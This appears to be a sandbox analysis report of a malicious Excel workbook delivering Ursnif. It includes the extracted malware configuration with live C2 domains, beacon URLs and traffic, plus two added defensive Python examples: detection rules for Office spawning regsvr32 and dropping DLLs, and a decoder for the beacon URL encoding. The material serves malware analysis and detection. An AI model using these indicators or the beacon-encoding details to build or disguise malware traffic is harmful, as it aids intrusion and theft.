Windows Analysis Report documentation_39236.xlsb

Overview

General Information

Sample Name: documentation_39236.xlsb
Analysis ID: 445916
MD5: 31ed7b3f7d7173afe801858e30c0fb62
SHA1: 40376b923682dc858806071f97cb64f781142dbb
SHA256: 8081a3a7be80c197b850d2c1e3cac75944d3fb55fda2b312815f565616366843

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Sigma detected: Office product drops executable at suspicious location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Office process drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Xls With Macro 4.0

AV Detection:

Found malware configuration
Source: 00000003.00000003.266469751.0000000000530000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "48n489DADvQETiNETBHyPBGGvRa6csWtqIuLSVOWYWKKC10mrbaCDTGmXT9+yBdCxu5rsz9H10sEVOKS1YbQqCSO7vHhJ4AqplAi0EpahHSG6iAjqlB8Ka8e19eFq+oWTyXFXNaCOa1ztfMCxuyaqADn0yfjtWeuipBCZ+WgBEXPEGD6cctVIddqMNHa0kzmsNtadDWoPRLlm3WMxbPQCRP0dzRx5jDY+C8wai2SJ7DJITIcBRF1En7YoFGFEsOcJvmCr4+vI12IDpy+U6ARTXUjcxKOcCsi8f3JnvpXpMyaus8R6AAz7bUHl5rTZsgEcjzMHpe+df4LlMvsTqR94H38v4JAsBa+Wcc33Pvxw/o=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "OkOYg3xmZhahWmvv", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
Multi AV Scanner detection for domain / URL
Source: gtr.antoinfer.com Virustotal: Detection: 7%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_001E39C5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 19_2_00FB39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 19_2_00FB39C5
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown HTTPS traffic detected: 162.241.253.78:443 -> 192.168.2.3:49725 version: TLS 1.2
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002F.00000002.582791755.000001E9AE630000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583021854.0000021D92B10000.00000002.00000001.sdmp
Source: Binary string: mscorlib.pdb source: csc.exe, 0000002F.00000002.590444392.000001E9B11EC000.00000002.00000001.sdmp
Source: Binary string: c:\Reply-quite\Cry_Country\523\Gave\Color\shape.pdb source: app[1].dll.1.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\Public\Documents\decrypt.dll
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: app[1].dll.1.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe
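The two behaviours in this section (EXCEL.EXE writing DLLs into INetCache and C:\Users\Public\Documents, then starting regsvr32.exe) are the same conditions the report's Sigma hits "Office product drops executable at suspicious location" and "Microsoft Office Product Spawning Windows Shell" describe. The following is an added example, not code from the report or from Joe Sandbox: two detection rules in Python run over a handful of constructed Sysmon-style process-creation (EventID 1) and file-creation (EventID 11) records. Only the image paths are taken from the report; the event shape, the `header` bytes and the benign noise records are assumptions, and no regsvr32 command line is matched because the report does not show one.

```python
import ntpath

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe",
               "msaccess.exe", "mspub.exe", "visio.exe"}
# Children an Office document has no business starting. regsvr32, mshta and
# powershell are the ones this report's "process start blacklist" and
# "Spawning Windows Shell" hits name; the rest are the usual LOLBins.
SHELL_LIKE = {"regsvr32.exe", "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
              "wscript.exe", "cscript.exe", "rundll32.exe", "certutil.exe", "msiexec.exe"}
PE_EXTENSIONS = {".exe", ".dll", ".scr", ".cpl", ".ocx"}
# Directories where EXCEL.EXE wrote the two DLLs in the report, plus common drop spots.
SUSPICIOUS_DIRS = ("\\users\\public\\", "\\inetcache\\", "\\appdata\\local\\temp\\",
                   "\\programdata\\", "\\appdata\\roaming\\")


def _exe(path: str) -> str:
    """Lower-cased file name of a Windows path (case-insensitive matching)."""
    return ntpath.basename(path).lower()


def office_spawns_shell(ev: dict) -> bool:
    """EventID 1: an Office binary is the direct parent of a shell-like process."""
    return (ev["id"] == 1
            and _exe(ev["parent"]) in OFFICE_APPS
            and _exe(ev["image"]) in SHELL_LIKE)


def office_drops_pe(ev: dict) -> bool:
    """EventID 11: an Office binary writes a PE into a user-writable drop directory.

    Prefer the MZ header when the sensor supplies the first bytes; fall back to
    the extension only when it does not, because droppers rename freely.
    """
    if ev["id"] != 11 or _exe(ev["image"]) not in OFFICE_APPS:
        return False
    target = ev["target"].lower()
    is_pe = (ev.get("header", b"")[:2] == b"MZ"
             or ntpath.splitext(target)[1] in PE_EXTENSIONS)
    return is_pe and any(d in target for d in SUSPICIOUS_DIRS)


RULES = {"office_spawns_shell": office_spawns_shell,
         "office_drops_pe": office_drops_pe}


def detect(events):
    """Return (rule_name, event) pairs for every rule that fires, in event order."""
    return [(name, ev) for ev in events for name, rule in RULES.items() if rule(ev)]


EXCEL = r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE"
# Constructed sample events (not from the sandbox log). The first three mirror
# the report's observations; the last three are benign noise.
EVENTS = [
    {"id": 1, "parent": EXCEL, "image": r"C:\Windows\SysWOW64\regsvr32.exe"},
    {"id": 11, "image": EXCEL, "target": r"C:\Users\Public\Documents\decrypt.dll",
     "header": b"MZ\x90\x00"},
    {"id": 11, "image": EXCEL, "header": b"MZ\x90\x00",
     "target": r"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll"},
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\SysWOW64\regsvr32.exe"},
    {"id": 11, "image": EXCEL, "target": r"C:\Users\user\Documents\budget.xlsx", "header": b"PK\x03\x04"},
    {"id": 1, "parent": EXCEL, "image": r"C:\Windows\splwow64.exe"},  # print helper, expected child
]

if __name__ == "__main__":
    for name, ev in detect(EVENTS):
        print(name, "->", ev.get("target") or ev["image"])
```

Both rules are deliberately narrow: the parent/child rule keys on the process tree rather than on command-line strings that the actor controls, and the drop rule requires both a PE indicator and a suspicious directory so that Excel writing an .xlsx or starting its print helper does not fire.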

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49755 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49755 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49757 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49757 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49759 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49760 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49760 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49762 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49762 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49761 -> 165.232.183.49:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49761 -> 165.232.183.49:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ALLEGHENYHEALTHNETWORKUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2FfIBHwVISTOJqyyE/yxzQpB4UhTtBihgn/15wt67RuhdWC2bp/AA4QTb7hSSc7ibwOLz/pdYBrbn9P/IhNkxf132wscOBr5M107/x3K_2BnAOaEK3ZrGH_2/BhQbh5Iq3KL0HGqeYocdUa/aitTSocVb3Ei8/K8Yn7wxH/8ZzNnAARdlf1lpPkD_2FTSI/88hMX1xgXx/WKheFQm4ijbivR_2F/Zqk2tiAD1SrE/7_2FLrw5q4N/ROSXMe9TmWNzIt/lpE2Vas7vRgwYKuDJRzfN/M8anWcq HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUVAWE43KR_2BAaOOd/VFdvQg3iI5nNB7ro/WwH2QRd3S4Jpyvs/BAGj3S8XfXokbtiE7i/hiopX3wKc/HclUJ6ir4iZ2Wbahh_2F/U4T4cSpeeoulqiraG2L/OcnB_2BpDFDp4gpBC5Tkhs/w68xYDIGC4qQh/4p7XqKDy/ZmjFv4NCLUhiS0t8WoyKwxb/hab8TjugII/SNATkC5REfp7kWCrA/g3JBPajXKX1i/qwbd_2FPu7J/lLmh_2BCbPNt2x/W33zXC7gkL52CnQJHgKW5/o596c7z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk5Ykbc8d/ir2ifxTr4LNwVXB57AO/naMzNC0NRqAZpafqf_2BA_/2Be4kMQ_2Bs4v/p3vimkya/tnJRXZOQhgPrD4eJIIoOBmz/6_2FqS0VmH/GdEp4ZZJMOcj3fIll/Gr7XyTEKPabp/aWzveP_2B5R/CbkrZ6KMbYewce/4JBfvb8ftJcY5XJZOep1x/uKyVwvTYfdKUGuNG/Emm_2BOgQKRpwFp/DFm1TypwhIB6euZx4o/ZnwoOdebK/P2zkNdJ1mC1FOPRaBbHj/tGtvylAtqDtqZZGz2/K HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLxdOtysJ/n0kMUo2t6MOWkWv9fh/vWxI1agPy/wQGFAQHZyVrGmWgCFodY/7FxYiI_2B53c0enExOR/GrTPqZ6XXPPo3SV3TEozm4/Exzy5YwFrUkYs/bQh_2FMD/0GOF4z17cCRm_2Fd6CEZwMn/XbmChIoDCR/BVkOjJKAuaNi81j2s/DAsZ7IX3Y_2F/9MNFRd8bZDE/rF3vDAxY3XVSH_/2BRf6xlnVaI7w67ANQeYN/HlP9zkWlJUqCL5u9/iWI0VgGL0n3Ke_2/BO2nUtcdX/UZ97 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/7AJjgFXMm7GK3zI8vuZf8x/2APU8PDwtmpAr/ANYuz5rb/u_2Ba0GWu8ipmpUp8uWalIe/b1DgDagPuJ/QMf4e8CmCgrJh1KOA/BEoe0WcWQ2Nu/avlRE03_2BA/ikzAyiPbN_2BHy/_2BYBLI5BgaFwR91PIKzH/SJ1rXSKpXvP3w4_2/BgNlAxmgSpCbzA3/rA6BVOnt_2Fs0ge7Ub/mZV_2ByZe/27QR_2F_2BkAwlW65Zcm/dBBVfaC3K9GAjFa76dp/yXioP6kRbgfKWsmcnd8JPP/othn HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIHQG/CB4JNANcQf7aA7/T_2FdtzxTEW5qEGgXi5de/wQDU_2FVQ9AqPhgZ/QBiqWLaZem_2BhU/Ub_2Bbrgr7V1ABDC_2/FRiGY94s4/Mw6BG5UCBUeOPfAvsqhw/LTDXh6l0kPjcKC2fY3f/eXzxQUf3im0jBAcOxzjmlM/t_2BlYZFFpOnU/rPHW4IFe/pXsS9omB7zF_2B_2BEp_2BV/Ya9nAT6p4X/2ixawH6C4M4LLI7hR/_2BGNe0TQDy_/2FBKn745niy/_2BRADxlO6wxP1/zz_2BWqAzRaI/gWg HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
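The ET rules 2033203 and 2033204 above fire on the `_2B` and `_2F` markers in the request paths: Ursnif/ISFB base64-encodes its encrypted beacon, rewrites `+` as `_2B` and `/` as `_2F` so the blob survives as a URL, and then inserts `/` at arbitrary positions to make it look like a deep path (note `7N_2/BPcj` in the first GET, where a marker is split across two segments). What follows is an added example, not code from the report or from any Ursnif tooling: it takes the first beacon URI and the `serpent_key` and `c2_domain` values from the extracted configuration, undoes the URL transform, and recovers the raw ciphertext. The `_0A` substitution for `=` padding is taken from public ISFB analyses and does not occur in this sample's URIs; the Serpent-CBC decryption that would turn the ciphertext into the `soft=...&version=...` beacon is not implemented here. The round-trip encoder and the non-beacon paths are constructed for testing.

```python
import base64
import binascii
import re

# From the report: the extracted configuration and the first beacon URI.
C2_DOMAINS = ["gtr.antoinfer.com", "app.bighomegl.at"]
SERPENT_KEY = b"OkOYg3xmZhahWmvv"          # 16 bytes, i.e. a 128-bit Serpent key
BEACON_URI = (
    "/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/"
    "Vmn_2FfIBHwVISTOJqyyE/yxzQpB4UhTtBihgn/15wt67RuhdWC2bp/AA4QTb7hSSc7ibwOLz/"
    "pdYBrbn9P/IhNkxf132wscOBr5M107/x3K_2BnAOaEK3ZrGH_2/BhQbh5Iq3KL0HGqeYocdUa/"
    "aitTSocVb3Ei8/K8Yn7wxH/8ZzNnAARdlf1lpPkD_2FTSI/88hMX1xgXx/WKheFQm4ijbivR_2F/"
    "Zqk2tiAD1SrE/7_2FLrw5q4N/ROSXMe9TmWNzIt/lpE2Vas7vRgwYKuDJRzfN/M8anWcq"
)

# ISFB's URL-safe rewrite of the base64 alphabet. '_2B' and '_2F' are what the
# ET rules 2033203/2033204 key on; '_0A' for '=' is reported in public ISFB
# write-ups (assumption for this example, not observed in this sample).
TOKENS = {"_2B": "+", "_2F": "/", "_0A": "="}
TOKEN_RE = re.compile("|".join(TOKENS))
B64_RE = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")


def normalize_uri(path: str) -> str:
    """Undo the ISFB URL transform and return padded base64.

    The '/' separators are stripped *before* the token substitution: a marker
    may straddle two path segments ('_2/B' in the sample URI) and would be
    missed if the path were processed segment by segment.
    """
    joined = path.split("?", 1)[0].replace("/", "")
    b64 = TOKEN_RE.sub(lambda m: TOKENS[m.group(0)], joined)
    return b64 + "=" * (-len(b64) % 4)


def recover_ciphertext(path: str):
    """Return the encrypted beacon body, or None if the path is not base64-shaped.

    The body is Serpent-CBC encrypted with SERPENT_KEY from the config; Serpent
    itself is out of scope for this example.
    """
    b64 = normalize_uri(path)
    if not B64_RE.match(b64):
        return None
    try:
        return base64.b64decode(b64, validate=True)
    except binascii.Error:
        return None


def looks_like_isfb_beacon(path: str) -> bool:
    """Triage check: the whole path is one base64 blob whose decoded length is a
    multiple of Serpent's 16-byte block size. /favicon.ico and ordinary REST
    paths fail this; every beacon GET in the report passes it."""
    ct = recover_ciphertext(path)
    return ct is not None and len(ct) >= 16 and len(ct) % 16 == 0


def encode_like_isfb(data: bytes, segment: int) -> str:
    """Forward transform (substitute, then slice) used to round-trip the decoder."""
    b64 = base64.b64encode(data).decode()
    for plain, token in (("+", "_2B"), ("/", "_2F"), ("=", "_0A")):
        b64 = b64.replace(plain, token)
    return "/" + "/".join(b64[i:i + segment] for i in range(0, len(b64), segment))


if __name__ == "__main__":
    ct = recover_ciphertext(BEACON_URI)
    # 320 base64 characters -> 240 bytes of ciphertext (15 Serpent blocks)
    print("base64 chars:", len(normalize_uri(BEACON_URI)), "ciphertext bytes:", len(ct))
    print("beacon-shaped:", looks_like_isfb_beacon(BEACON_URI),
          "favicon:", looks_like_isfb_beacon("/favicon.ico"))
```

The shape check is useful as a network hunting filter alongside the Host header (match against `C2_DOMAINS`) because it is independent of the specific marker strings the Snort rules depend on; an operator who changed `_2B`/`_2F` to other tokens would still produce slash-sliced base64 with a block-aligned payload.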
Source: msapplication.xml0.23.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.23.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.23.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.23.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.23.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.23.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: free.mynowministries.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 08 Jul 2021 13:46:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: powershell.exe, 00000027.00000002.587349219.000002B5AD3CF000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: {5DCD6FF8-E03E-11EB-90E4-ECF4BB862DED}.dat.23.dr, ~DF99BD870E81A4914B.TMP.23.dr String found in binary or memory: http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2F
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp String found in binary or memory: http://gtr.antoinfer.com/IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/
Source: {7879BAAA-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DF4AB9BBFB5CFFE773.TMP.28.dr String found in binary or memory: http://gtr.antoinfer.com/IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/7AJjg
Source: {7879BAA8-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr String found in binary or memory: http://gtr.antoinfer.com/MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLx
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp String found in binary or memory: http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gare
Source: {7879BAAC-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr String found in binary or memory: http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIH
Source: {7879BAA6-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DFA7B5BF1FB774EA36.TMP.28.dr String found in binary or memory: http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk
Source: {7879BAA4-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DF436C4ACF406520B7.TMP.28.dr String found in binary or memory: http://gtr.antoinfer.com/xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUV
Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
